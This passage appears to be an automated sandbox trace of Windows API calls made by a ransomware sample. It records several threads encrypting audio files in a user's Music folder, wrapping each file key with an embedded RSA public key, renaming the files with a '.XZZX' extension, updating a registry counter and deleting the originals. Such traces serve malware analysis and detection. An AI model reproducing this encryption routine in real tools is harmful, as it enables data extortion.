lpNumberOfBytesWritten=0x47ce438*=0x5, lpOverlapped=0x0) returned 1 [0049.640] SetFilePointer (in: hFile=0x5b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x170 [0049.640] WriteFile (in: hFile=0x5b8, lpBuffer=0x47cf860*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x47ce438, lpOverlapped=0x0 | out: lpBuffer=0x47cf860*, lpNumberOfBytesWritten=0x47ce438*=0x20, lpOverlapped=0x0) returned 1 [0049.640] SetFilePointer (in: hFile=0x5b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x190 [0049.640] WriteFile (in: hFile=0x5b8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x47ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x47ce438*=0x5, lpOverlapped=0x0) returned 1 [0049.641] SetFilePointer (in: hFile=0x5b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x195 [0049.641] SetErrorMode (uMode=0x1) returned 0x1 [0049.641] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0049.641] OutputDebugStringW (lpOutputString="end") [0049.641] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wp\x91â\x03`Õ|\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x47cdbf4, pcbBinary=0x47cd3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x47cdbf4, pcbBinary=0x47cd3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0049.641] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x47cdbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x47cd3dc, pcbStructInfo=0x47cd3d8 | out: pvStructInfo=0x47cd3dc, pcbStructInfo=0x47cd3d8) returned 1 [0049.641] CryptAcquireContextW (in: phProv=0x47cd3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x47cd3e4*=0x3e42cb0) returned 1 [0049.642] CryptImportPublicKeyInfo (in: hCryptProv=0x3e42cb0, dwCertEncodingType=0x1, pInfo=0x42e0600*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x42e0630*, PublicKey.cbData=0x8c, PublicKey.pbData=0x42e0638*, PublicKey.cUnusedBits=0x0), phKey=0x47cd3ec | out: phKey=0x47cd3ec*=0x3e281b8) returned 1 [0049.642] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0049.642] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0049.642] CryptEncrypt (in: hKey=0x3e281b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x47cd3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x47cd3f0*=0x80) returned 1 [0049.642] CryptEncrypt (in: hKey=0x3e281b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3e42d38*, pdwDataLen=0x47cd3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3e42d38*, pdwDataLen=0x47cd3e8*=0x80) returned 1 [0049.642] WriteFile (in: hFile=0x5b8, lpBuffer=0x3e42d38*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x47ce438, lpOverlapped=0x0 | out: lpBuffer=0x3e42d38*, lpNumberOfBytesWritten=0x47ce438*=0x80, lpOverlapped=0x0) returned 1 [0049.642] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0049.642] WriteFile (in: hFile=0x5b8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x47ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x47ce438*=0x5, lpOverlapped=0x0) returned 1 [0049.642] GetUserNameW (in: lpBuffer=0x47ce1f8, pcbBuffer=0x47cdfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x47cdfe0) returned 1 [0049.643] wsprintfW (in: param_1=0x47cdff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0049.643] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x47cdfe4 | out: phkResult=0x47cdfe4*=0x5e8) returned 0x0 [0049.643] RegQueryValueExW (in: hKey=0x5e8, lpValueName="E1010314", lpReserved=0x0, lpType=0x47cdfd8, lpData=0x47cdfec, lpcbData=0x47cdfdc*=0x4 | out: lpType=0x47cdfd8*=0x4, lpData=0x47cdfec*=0x51, lpcbData=0x47cdfdc*=0x4) returned 0x0 [0049.643] RegCloseKey (hKey=0x5e8) returned 0x0 [0049.643] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x47cdfe8 | out: phkResult=0x47cdfe8*=0x5e8) returned 0x0 [0049.643] RegSetValueExW (in: hKey=0x5e8, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x47cdfec*=0x52, cbData=0x4 | out: lpData=0x47cdfec*=0x52) returned 0x0 [0049.643] RegCloseKey (hKey=0x5e8) returned 0x0 [0049.643] VirtualFree (lpAddress=0x3ef0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0049.643] VirtualFree (lpAddress=0x3f00000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0049.644] CloseHandle (hObject=0x5b8) returned 1 [0049.644] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0049.645] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0049.645] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\recentplaces.lnk")) returned 1 [0049.645] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\recentplaces.lnk")) returned 0 Thread: id = 178 os_tid = 0xaf4 [0049.388] lstrcpyA (in: lpString1=0x42cfc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0049.388] lstrcpyW (in: lpString1=0x42cf460, lpString2="11DaFVcd U6Q75nbu_.wav" | out: lpString1="11DaFVcd U6Q75nbu_.wav") returned="11DaFVcd U6Q75nbu_.wav" [0049.388] lstrcpyW (in: lpString1=0x42ce860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0049.388] SetErrorMode (uMode=0x1) returned 0x1 [0049.389] lstrcpyW (in: lpString1=0x42cf860, lpString2="11DaFVcd U6Q75nbu_.wav" | out: lpString1="11DaFVcd U6Q75nbu_.wav") returned="11DaFVcd U6Q75nbu_.wav" [0049.389] CoCreateGuid (in: pguid=0x42ce440 | out: pguid=0x42ce440*(Data1=0x8f3cb62a, Data2=0x329b, Data3=0x417e, Data4=([0]=0x85, [1]=0x2, [2]=0x43, [3]=0x58, [4]=0x32, [5]=0x17, [6]=0xe6, [7]=0xc8))) returned 0x0 [0049.389] wsprintfW (in: param_1=0x42cec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\11DaFVcd U6Q75nbu_.wav") returned 62 [0049.389] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x42cfee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0049.389] wsprintfW (in: param_1=0x42ce450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\95567F6E0CF2434A8F3CB62A111F2792.XZZX") returned 77 [0049.389] StrStrW (lpFirst="11DaFVcd U6Q75nbu_.wav", lpSrch="XZZX") returned 0x0 [0049.389] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\11DaFVcd U6Q75nbu_.wav", dwFileAttributes=0x20) returned 1 [0049.389] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\11DaFVcd U6Q75nbu_.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\11dafvcd u6q75nbu_.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0049.389] ReadFile (in: hFile=0x130, lpBuffer=0x42ef5f0, nNumberOfBytesToRead=0x23aa, lpNumberOfBytesRead=0x42ce418, lpOverlapped=0x0 | out: lpBuffer=0x42ef5f0*, lpNumberOfBytesRead=0x42ce418*=0x23aa, lpOverlapped=0x0) returned 1 [0049.390] CloseHandle (hObject=0x130) returned 1 [0049.390] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x4930000 [0049.391] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x4940000 [0049.391] SetErrorMode (uMode=0x1) returned 0x1 [0049.391] lstrcpyW (in: lpString1=0x42ce358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0049.391] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3e42b18) returned 1 [0049.394] CryptGenKey (in: hProv=0x3e42b18, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3e28238) returned 1 [0049.993] CryptExportKey (in: hKey=0x3e28238, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x42ce41c | out: pbData=0x0*, pdwDataLen=0x42ce41c*=0x94) returned 1 [0049.993] CryptExportKey (in: hKey=0x3e28238, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x4940000, pdwDataLen=0x42ce41c | out: pbData=0x4940000*, pdwDataLen=0x42ce41c*=0x94) returned 1 [0049.993] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0049.994] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0049.994] CryptDestroyKey (hKey=0x3e28238) returned 1 [0049.994] CryptReleaseContext (hProv=0x3e42e48, dwFlags=0x0) returned 0 [0049.994] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\95567F6E0CF2434A8F3CB62A111F2792.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\95567f6e0cf2434a8f3cb62a111f2792.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5f4 [0049.994] WriteFile (in: hFile=0x5f4, lpBuffer=0x42ef5f0*, nNumberOfBytesToWrite=0x23aa, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x42ef5f0*, lpNumberOfBytesWritten=0x42ce438*=0x23aa, lpOverlapped=0x0) returned 1 [0049.995] SetFilePointer (in: hFile=0x5f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x23aa [0049.995] WriteFile (in: hFile=0x5f4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0049.995] SetFilePointer (in: hFile=0x5f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x23af [0049.995] WriteFile (in: hFile=0x5f4, lpBuffer=0x42cf860*, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x42cf860*, lpNumberOfBytesWritten=0x42ce438*=0x2c, lpOverlapped=0x0) returned 1 [0049.995] SetFilePointer (in: hFile=0x5f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x23db [0049.995] WriteFile (in: hFile=0x5f4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0049.995] SetFilePointer (in: hFile=0x5f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x23e0 [0049.995] SetErrorMode (uMode=0x1) returned 0x1 [0049.995] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0049.995] OutputDebugStringW (lpOutputString="end") [0049.996] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----w\x80a-\x04`Õ,\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x42cdbf4, pcbBinary=0x42cd3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x42cdbf4, pcbBinary=0x42cd3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0049.996] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x42cdbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x42cd3dc, pcbStructInfo=0x42cd3d8 | out: pvStructInfo=0x42cd3dc, pcbStructInfo=0x42cd3d8) returned 1 [0049.996] CryptAcquireContextW (in: phProv=0x42cd3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x42cd3e4*=0x3e42ed0) returned 1 [0049.996] CryptImportPublicKeyInfo (in: hCryptProv=0x3e42ed0, dwCertEncodingType=0x1, pInfo=0x42e0c80*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x42e0cb0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x42e0cb8*, PublicKey.cUnusedBits=0x0), phKey=0x42cd3ec | out: phKey=0x42cd3ec*=0x3e28238) returned 1 [0049.996] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0049.997] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0049.997] CryptEncrypt (in: hKey=0x3e28238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x42cd3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x42cd3f0*=0x80) returned 1 [0049.997] CryptEncrypt (in: hKey=0x3e28238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3e42f58*, pdwDataLen=0x42cd3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3e42f58*, pdwDataLen=0x42cd3e8*=0x80) returned 1 [0049.997] WriteFile (in: hFile=0x5f4, lpBuffer=0x3e42f58*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x3e42f58*, lpNumberOfBytesWritten=0x42ce438*=0x80, lpOverlapped=0x0) returned 1 [0049.997] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0049.997] WriteFile (in: hFile=0x5f4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0049.997] GetUserNameW (in: lpBuffer=0x42ce1f8, pcbBuffer=0x42cdfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x42cdfe0) returned 1 [0049.997] wsprintfW (in: param_1=0x42cdff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0049.997] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x42cdfe4 | out: phkResult=0x42cdfe4*=0x5f8) returned 0x0 [0049.997] RegQueryValueExW (in: hKey=0x5f8, lpValueName="E1010314", lpReserved=0x0, lpType=0x42cdfd8, lpData=0x42cdfec, lpcbData=0x42cdfdc*=0x4 | out: lpType=0x42cdfd8*=0x4, lpData=0x42cdfec*=0x52, lpcbData=0x42cdfdc*=0x4) returned 0x0 [0049.997] RegCloseKey (hKey=0x5f8) returned 0x0 [0049.997] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x42cdfe8 | out: phkResult=0x42cdfe8*=0x5f8) returned 0x0 [0049.998] RegSetValueExW (in: hKey=0x5f8, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x42cdfec*=0x53, cbData=0x4 | out: lpData=0x42cdfec*=0x53) returned 0x0 [0049.998] RegCloseKey (hKey=0x5f8) returned 0x0 [0049.998] VirtualFree (lpAddress=0x4930000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0049.998] VirtualFree (lpAddress=0x4940000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0049.998] CloseHandle (hObject=0x5f4) returned 1 [0049.999] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0049.999] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0049.999] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\11DaFVcd U6Q75nbu_.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\11dafvcd u6q75nbu_.wav")) returned 1 [0050.000] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\11DaFVcd U6Q75nbu_.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\11dafvcd u6q75nbu_.wav")) returned 0 Thread: id = 179 os_tid = 0x638 [0049.646] lstrcpyA (in: lpString1=0x492fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0049.646] lstrcpyW (in: lpString1=0x492f460, lpString2="8YglZU.wav" | out: lpString1="8YglZU.wav") returned="8YglZU.wav" [0049.646] lstrcpyW (in: lpString1=0x492e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\" [0049.646] SetErrorMode (uMode=0x1) returned 0x1 [0049.646] lstrcpyW (in: lpString1=0x492f860, lpString2="8YglZU.wav" | out: lpString1="8YglZU.wav") returned="8YglZU.wav" [0049.646] CoCreateGuid (in: pguid=0x492e440 | out: pguid=0x492e440*(Data1=0x3ebb395a, Data2=0x55aa, Data3=0x4e2a, Data4=([0]=0x9e, [1]=0x24, [2]=0x11, [3]=0x98, [4]=0x73, [5]=0x42, [6]=0x1e, [7]=0x99))) returned 0x0 [0049.646] wsprintfW (in: param_1=0x492ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\8YglZU.wav") returned 50 [0049.646] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x492fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0049.646] wsprintfW (in: param_1=0x492e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\D25EF7C41A27D9E43EBB395A1EBABE2C.XZZX") returned 77 [0049.646] StrStrW (lpFirst="8YglZU.wav", lpSrch="XZZX") returned 0x0 [0049.646] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\8YglZU.wav", dwFileAttributes=0x20) returned 1 [0049.646] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\8YglZU.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\8yglzu.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c0 [0049.647] ReadFile (in: hFile=0x5c0, lpBuffer=0x42e5eb8, nNumberOfBytesToRead=0x62f6, lpNumberOfBytesRead=0x492e418, lpOverlapped=0x0 | out: lpBuffer=0x42e5eb8*, lpNumberOfBytesRead=0x492e418*=0x62f6, lpOverlapped=0x0) returned 1 [0049.647] CloseHandle (hObject=0x5c0) returned 1 [0049.647] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3e90000 [0049.648] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3ea0000 [0049.648] SetErrorMode (uMode=0x1) returned 0x1 [0049.648] lstrcpyW (in: lpString1=0x492e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0049.648] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3e42dc0) returned 1 [0049.650] CryptGenKey (in: hProv=0x3e42dc0, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3e282b8) returned 1 [0050.144] CryptExportKey (in: hKey=0x3e282b8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x492e41c | out: pbData=0x0*, pdwDataLen=0x492e41c*=0x94) returned 1 [0050.144] CryptExportKey (in: hKey=0x3e282b8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3ea0000, pdwDataLen=0x492e41c | out: pbData=0x3ea0000*, pdwDataLen=0x492e41c*=0x94) returned 1 [0050.144] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0050.145] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0050.145] CryptDestroyKey (hKey=0x3e282b8) returned 1 [0050.145] CryptReleaseContext (hProv=0x3e42fe0, dwFlags=0x0) returned 0 [0050.145] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\D25EF7C41A27D9E43EBB395A1EBABE2C.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\d25ef7c41a27d9e43ebb395a1ebabe2c.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5f8 [0050.145] WriteFile (in: hFile=0x5f8, lpBuffer=0x42e5eb8*, nNumberOfBytesToWrite=0x62f6, lpNumberOfBytesWritten=0x492e438, lpOverlapped=0x0 | out: lpBuffer=0x42e5eb8*, lpNumberOfBytesWritten=0x492e438*=0x62f6, lpOverlapped=0x0) returned 1 [0050.146] SetFilePointer (in: hFile=0x5f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x62f6 [0050.146] 